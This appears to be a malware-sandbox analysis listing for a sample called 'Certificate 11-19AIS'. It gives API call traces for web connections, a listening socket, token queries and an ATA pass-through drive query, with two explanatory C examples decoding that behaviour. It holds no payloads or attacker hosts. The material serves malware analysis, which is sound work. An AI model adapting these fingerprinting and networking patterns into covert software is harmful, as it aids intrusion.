• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0082E4C0,?,?,?), ref: 0081F2A6
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: 65be7a52a91685db726fdce3ee0ca7504d8a68bed93de77f6314ffedfcae1578
• Instruction ID: b398eb099a14916f41270e059c602051b1afb625e1461c3c5133aa4d6528eaa6
• Opcode Fuzzy Hash: 65be7a52a91685db726fdce3ee0ca7504d8a68bed93de77f6314ffedfcae1578
• Instruction Fuzzy Hash: C221B179500128EFCF258F98D859EEE7BB9FF4A710F048069FA09872A2D3349D90DB50
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00804358
  • Part of subcall function 008043E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00804401
  • Part of subcall function 008043E2: InternetCloseHandle.WININET(00000000), ref: 0080449E
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
• Opcode ID: 72fb104114ef2aaaf44d2e4c67769abbdbb372910baa00556c60d2ad3518108e
• Instruction ID: 83fb71c56a3357d054dd03de947a576f0450d3bc2ca7980237bca855553a3119
• Opcode Fuzzy Hash: 72fb104114ef2aaaf44d2e4c67769abbdbb372910baa00556c60d2ad3518108e
• Instruction Fuzzy Hash: D221D1B5240B05BBEB519F60EC01FBBB7A9FF84714F11601AFB15D6690DB7198209BA0
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00818AA6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00818AC0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00818ACE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00818ADC
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: ee8c93196a66edd984697de00e17042e1d91011ee72c253816a7cc2378522873
• Instruction ID: e878332bec73ae5a8fe91034be9453e64e86dd56ac0aca4f2b8016b5c45ecf6e
• Opcode Fuzzy Hash: ee8c93196a66edd984697de00e17042e1d91011ee72c253816a7cc2378522873
• Instruction Fuzzy Hash: 12116A31205125AFD714AB28DC0AFAA779DFF85320F14451AF916C72A2DB64AC418795
                                                                              APIs
                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00808AE0
                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00808AF2
                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00808AFF
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808B16
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastacceptselect
                                                                              • String ID:
                                                                              • API String ID: 385091864-0
                                                                              • Opcode ID: 564f006a10ed801c282094997eeaa9761408a1148754be57c69bf5d5f73ef252
                                                                              • Instruction ID: 934267966cb770af8c86e44429b57a7646a4697ab93994864ba89da6ef9e81fb
                                                                              • Opcode Fuzzy Hash: 564f006a10ed801c282094997eeaa9761408a1148754be57c69bf5d5f73ef252
                                                                              • Instruction Fuzzy Hash: 07216672A001249FC7219F69DC99A9EBBECFF89350F00456AF849D7291DB7499418F90
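The four calls in the entry above (select, __WSAFDIsSet, accept, WSAGetLastError at 00808AE0 through 00808B16) are the non-blocking accept idiom: poll the listening socket with select, test the returned descriptor set, and only then call accept, reading the last error when either step fails. The __WSAFDIsSet import is worth recognising on its own: Winsock's FD_ISSET macro expands to a call to it, so its presence means the code used FD_ISSET rather than inspecting the fd_set by hand. The following is an added example, not code from the sample or from Joe Sandbox; it uses POSIX sockets so it runs on Linux, where FD_ISSET and errno play the roles of __WSAFDIsSet and WSAGetLastError, and the loopback listener plus single client connection are constructed for the demo.

```c
#include <arpa/inet.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>

/* Poll a listening socket exactly once, as the select/FD_ISSET/accept sequence does.
 * Returns >0 (accepted client fd), 0 (nothing pending yet) or -1 (error; *err receives
 * errno, the POSIX counterpart of WSAGetLastError). */
int poll_accept(int listen_fd, int *err)
{
    fd_set readable;
    struct timeval zero = { 0, 0 };          /* zero timeout: never block */
    FD_ZERO(&readable);
    FD_SET(listen_fd, &readable);

    int n = select(listen_fd + 1, &readable, NULL, NULL, &zero);
    if (n < 0) { if (err) *err = errno; return -1; }
    if (n == 0 || !FD_ISSET(listen_fd, &readable))   /* FD_ISSET is __WSAFDIsSet on Winsock */
        return 0;

    int client = accept(listen_fd, NULL, NULL);
    if (client < 0) { if (err) *err = errno; return -1; }
    return client;
}

/* Constructed scenario for the demo: a loopback listener on a kernel-chosen port is polled
 * once with no client (expect 0), then once after a client has connected (expect an fd > 0).
 * Returns 1 when both polls behave that way, 0 when they do not, -1 on setup failure. */
int demo_poll_accept(void)
{
    int result = -1, lfd = -1, cfd = -1, first = -1, second = -1, err = 0;
    struct sockaddr_in addr;
    socklen_t alen = sizeof addr;

    lfd = socket(AF_INET, SOCK_STREAM, 0);
    if (lfd < 0) return -1;
    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = 0;                       /* port 0: the kernel picks a free one */
    if (bind(lfd, (struct sockaddr *)&addr, sizeof addr) < 0 || listen(lfd, 1) < 0 ||
        getsockname(lfd, (struct sockaddr *)&addr, &alen) < 0)
        goto out;

    first = poll_accept(lfd, &err);          /* no client yet: select reports nothing */

    cfd = socket(AF_INET, SOCK_STREAM, 0);
    if (cfd < 0 || connect(cfd, (struct sockaddr *)&addr, sizeof addr) < 0)
        goto out;
    second = poll_accept(lfd, &err);         /* loopback handshake is complete: connection queued */

    result = (first == 0 && second > 0) ? 1 : 0;
out:
    if (second > 0) close(second);
    if (cfd >= 0) close(cfd);
    close(lfd);
    return result;
}

int main(void)
{
    int r = demo_poll_accept();
    printf("poll-then-accept demo: %s\n", r == 1 ? "ok" : (r == 0 ? "unexpected" : "setup failed"));
    return r == 1 ? 0 : 1;
}
```

A caller that wants the behaviour of a scripting runtime's accept primitive simply calls poll_accept in a loop and treats 0 as "try again later"; the -1 path is where the WSAGetLastError call in the listing sits.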
                                                                              APIs
                                                                                • Part of subcall function 007F1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007F0ABB,?,?,?,007F187A,00000000,000000EF,00000119,?,?), ref: 007F1E77
                                                                                • Part of subcall function 007F1E68: lstrcpyW.KERNEL32(00000000,?,?,007F0ABB,?,?,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F1E9D
                                                                                • Part of subcall function 007F1E68: lstrcmpiW.KERNEL32(00000000,?,007F0ABB,?,?,?,007F187A,00000000,000000EF,00000119,?,?), ref: 007F1ECE
                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F0AD4
                                                                              • lstrcpyW.KERNEL32(00000000,?,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F0AFA
                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,007F187A,00000000,000000EF,00000119,?,?,00000000), ref: 007F0B2E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                              • String ID: cdecl
                                                                              • API String ID: 4031866154-3896280584
                                                                              • Opcode ID: 72eff79c8bc3575232778eaca97e905a18ce8551d32858827dd10f4b68835f7d
                                                                              • Instruction ID: 6098357fe1759112df80168805a1385c38ff96355d409f4478e4651f847afb10
                                                                              • Opcode Fuzzy Hash: 72eff79c8bc3575232778eaca97e905a18ce8551d32858827dd10f4b68835f7d
                                                                              • Instruction Fuzzy Hash: 9411BE76200309EFDB25AF34DC09E7A77A9FF45310B80406AEA06CB391EB759850C7E0
                                                                              APIs
                                                                              • _free.LIBCMT ref: 007E2FB5
                                                                                • Part of subcall function 007D395C: __FF_MSGBANNER.LIBCMT ref: 007D3973
                                                                                • Part of subcall function 007D395C: __NMSG_WRITE.LIBCMT ref: 007D397A
                                                                                • Part of subcall function 007D395C: RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,007CF507,?,0000000E), ref: 007D399F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap_free
                                                                              • String ID:
                                                                              • API String ID: 614378929-0
                                                                              • Opcode ID: 0f92248d7609c060e732a33478dbd8b8d9264a556043bb586db70d11517911a1
                                                                              • Instruction ID: e8df54f9e03921d15f13e6b222a84223f0f528cda6a6a8bc3c9965f4eb70820a
                                                                              • Opcode Fuzzy Hash: 0f92248d7609c060e732a33478dbd8b8d9264a556043bb586db70d11517911a1
                                                                              • Instruction Fuzzy Hash: 3811EB3140A251EFDB213B71AC0D6593BACAF483A4F204C16F80D9A252EA3CCD40CAA0
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007F05AC
                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007F05C7
                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007F05DD
                                                                              • FreeLibrary.KERNEL32(?), ref: 007F0632
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                              • String ID:
                                                                              • API String ID: 3137044355-0
                                                                              • Opcode ID: 1595b4cd06ff7446c962cefbf9ade6167f7240bfb101a82c9f503b201dc65e5a
                                                                              • Instruction ID: f7e10d5a56a11f2ac5c7c67f76931de75488aa8f2777d926ffaa60652cc8fb3c
                                                                              • Opcode Fuzzy Hash: 1595b4cd06ff7446c962cefbf9ade6167f7240bfb101a82c9f503b201dc65e5a
                                                                              • Instruction Fuzzy Hash: C221517190020DEBDB208F91DC88AEAB7B8EF40700F108469E616D2351D774EA559B91
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007F6733
                                                                              • _memset.LIBCMT ref: 007F6754
                                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007F67A6
                                                                              • CloseHandle.KERNEL32(00000000), ref: 007F67AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                              • String ID:
                                                                              • API String ID: 1157408455-0
                                                                              • Opcode ID: f446c1ad9aadb8cf88ceff2b05909be290ab7f3195175bbb6cacd103cde69266
                                                                              • Instruction ID: 80ea37738fe7f266d27df6709b5b1847820bb5a5b12ae50dbf42520bfdb59bcc
                                                                              • Opcode Fuzzy Hash: f446c1ad9aadb8cf88ceff2b05909be290ab7f3195175bbb6cacd103cde69266
                                                                              • Instruction Fuzzy Hash: 9B110A72901228BAE72067A5AC4DFAFBABCEF44724F10459AF504E72C0D2745E808BB4
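The entry above opens a device with CreateFileW for GENERIC_READ|GENERIC_WRITE (C0000000), FILE_SHARE_READ|FILE_SHARE_WRITE (3), OPEN_EXISTING (3) and FILE_ATTRIBUTE_NORMAL (80), zeroes a buffer, and issues DeviceIoControl with control code 0004D02C and 0x200-byte input and output buffers; the device path is not resolved in the listing. The control code is the useful part for an analyst. Unpacking it with the CTL_CODE layout from winioctl.h gives device type 4 (FILE_DEVICE_CONTROLLER, the SCSI/ATA base), function 0x40B, METHOD_BUFFERED and read+write access, which is IOCTL_ATA_PASS_THROUGH from ntddscsi.h, a pass-through commonly used to send IDENTIFY DEVICE to a physical drive and read its model and serial strings. The decoder below is an added example, not code from the sample or from Joe Sandbox; its name table is limited to a few storage IOCTLs whose values are fixed by the public headers, and anything else reports as unknown.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Windows packs an I/O control code as
 *   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
 * which is what the CTL_CODE macro in winioctl.h does. */
struct ioctl_fields {
    uint32_t device_type;   /* bits 31..16 */
    uint32_t access;        /* bits 15..14: 0 any, 1 read, 2 write, 3 read+write */
    uint32_t function;      /* bits 13..2 */
    uint32_t method;        /* bits 1..0: 0 buffered, 1 in_direct, 2 out_direct, 3 neither */
};

struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFF;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2)  & 0xFFF;
    f.method      = code & 0x3;
    return f;
}

/* Inverse of decode_ioctl, equivalent to CTL_CODE(). */
uint32_t ctl_code(uint32_t device_type, uint32_t function, uint32_t method, uint32_t access)
{
    return (device_type << 16) | (access << 14) | (function << 2) | method;
}

/* A deliberately short table; values follow from the definitions in winioctl.h and ntddscsi.h. */
static const struct { uint32_t code; const char *name; } known_ioctls[] = {
    { 0x0004D004, "IOCTL_SCSI_PASS_THROUGH" },
    { 0x0004D014, "IOCTL_SCSI_PASS_THROUGH_DIRECT" },
    { 0x0004D02C, "IOCTL_ATA_PASS_THROUGH" },
    { 0x0004D030, "IOCTL_ATA_PASS_THROUGH_DIRECT" },
    { 0x002D1400, "IOCTL_STORAGE_QUERY_PROPERTY" },
    { 0x00070000, "IOCTL_DISK_GET_DRIVE_GEOMETRY" },
};

const char *ioctl_name(uint32_t code)
{
    for (size_t i = 0; i < sizeof known_ioctls / sizeof known_ioctls[0]; i++)
        if (known_ioctls[i].code == code)
            return known_ioctls[i].name;
    return "unknown";
}

static const char *method_str(uint32_t m)
{
    static const char *names[] = { "METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER" };
    return names[m & 3];
}

int main(void)
{
    uint32_t code = 0x0004D02C;   /* the value passed to DeviceIoControl at 007F67A6 */
    struct ioctl_fields f = decode_ioctl(code);
    printf("%08X: device_type 0x%X function 0x%03X %s access %u -> %s\n",
           code, f.device_type, f.function, method_str(f.method), f.access, ioctl_name(code));
    return 0;
}
```

The same decoder is the first thing to run on any unfamiliar DeviceIoControl constant in a listing; device type and function number narrow the driver and operation even when no name table matches.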
                                                                              APIs
                                                                                • Part of subcall function 007EAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007EAA79
                                                                                • Part of subcall function 007EAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007EAA83
                                                                                • Part of subcall function 007EAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007EAA92
                                                                                • Part of subcall function 007EAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007EAA99
                                                                                • Part of subcall function 007EAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007EAAAF
                                                                              • GetLengthSid.ADVAPI32(?,00000000,007EADE4,?,?), ref: 007EB21B
                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007EB227
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 007EB22E
                                                                              • CopySid.ADVAPI32(?,00000000,?), ref: 007EB247
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                              • String ID:
                                                                              • API String ID: 4217664535-0
                                                                              • Opcode ID: 5aebab0c24794800907081fc6cda33447152a38b6921af4cc5aa8bedf91701a7
                                                                              • Instruction ID: dc3682603c3651310199203bb75fdfa9c3e5c852058858892e90daeb0ed3330f
                                                                              • Opcode Fuzzy Hash: 5aebab0c24794800907081fc6cda33447152a38b6921af4cc5aa8bedf91701a7
                                                                              • Instruction Fuzzy Hash: CC119171A02205FFDB049FA5DD95AAFBBADFF89304F14842DEA4297210D739AE44DB10
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 007EB498
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007EB4AA
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007EB4C0
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007EB4DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 2fa3a3b99a886fba577e1a90cbbfb57f4a4d8cd623b3cf2cd3fb60a3024b7428
                                                                              • Instruction ID: 69fc412dbc3374113d6bae958c5623e35f5e36118f405dd1188117405e9f689e
                                                                              • Opcode Fuzzy Hash: 2fa3a3b99a886fba577e1a90cbbfb57f4a4d8cd623b3cf2cd3fb60a3024b7428
                                                                              • Instruction Fuzzy Hash: 74115A7A901258FFEB11DFA9C885E9EBBB4FB09700F204091E604BB290D771AE10DB94
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 007CB5A5
                                                                              • GetClientRect.USER32(?,?), ref: 0082E69A
                                                                              • GetCursorPos.USER32(?), ref: 0082E6A4
                                                                              • ScreenToClient.USER32(?,?), ref: 0082E6AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 4127811313-0
                                                                              • Opcode ID: 910fdf86191054b071df2cc213c561c1241028dc7ed97446c9294439e635141d
                                                                              • Instruction ID: 4da75cc1e2815872e3a2a6c209d2b6cbde1474730e27ba34cc81858d856536b0
                                                                              • Opcode Fuzzy Hash: 910fdf86191054b071df2cc213c561c1241028dc7ed97446c9294439e635141d
                                                                              • Instruction Fuzzy Hash: AD110A31900129FBCB10DFA8EC4ADEE77B9FB59305F100859F911E7140D734AA96CBA5
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 007F7352
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 007F7385
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007F739B
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007F73A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 2880819207-0
                                                                              • Opcode ID: d36bcdac4d5c2a69aad1652aa083882a2fa58c074dbe5a93dc00b490003fa560
                                                                              • Instruction ID: e244ef938480c0aa2dda53fd526d9026069d0d935997b9fea6e36358eb687899
                                                                              • Opcode Fuzzy Hash: d36bcdac4d5c2a69aad1652aa083882a2fa58c074dbe5a93dc00b490003fa560
                                                                              • Instruction Fuzzy Hash: FE114472A04249BFC7019BACEC09AAE7BADBF84311F104315F925D33A6D274CD0097A1
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                                              • GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              APIs
                                                                                • Part of subcall function 007D7A0D: __getptd_noexit.LIBCMT ref: 007D7A0E
                                                                              • __lock.LIBCMT ref: 007D748F
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 007D74AC
                                                                              • _free.LIBCMT ref: 007D74BF
